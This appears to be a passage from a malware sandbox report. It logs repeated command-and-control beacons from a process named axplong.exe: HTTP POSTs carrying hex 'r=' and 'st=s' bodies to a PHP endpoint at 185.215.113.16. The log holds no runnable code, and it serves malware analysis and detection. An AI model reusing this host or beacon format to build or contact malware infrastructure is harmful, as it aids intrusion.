Aug 19, 2024 06:04:49.838299990 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:50.088013887 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49776	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:50.247502089 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:51.009861946 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:51.041227102 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:51.288824081 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49777	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:51.403954983 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:52.172983885 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:52.188225031 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:52.438714981 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49778	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:52.569452047 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:53.321903944 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:53.352539062 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:53.602086067 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49779	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:54.048535109 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:54.805726051 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:54.806837082 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:55.058980942 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49780	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:55.169744015 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:55.920223951 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:55.920855045 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:56.175745964 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49781	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:56.318845987 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:57.072892904 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:57.073775053 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:57.322432995 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49782	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:57.450675011 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:58.208885908 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:58.209592104 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:58.460247040 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49783	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:58.742038012 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:04:59.404010057 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:04:59.446650028 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:04:59.697982073 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:04:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49784	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:04:59.838140965 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:00.586883068 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:05:00.587604046 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:00.838459015 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49785	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:00.952277899 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:01.791285038 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:05:01.813167095 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:02.067249060 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49786	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:02.187730074 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:02.954927921 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:05:03.012852907 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:03.264133930 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49787	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:03.372756004 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:05:04.141145945 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 19, 2024 06:05:04.142515898 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:04.420346975 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
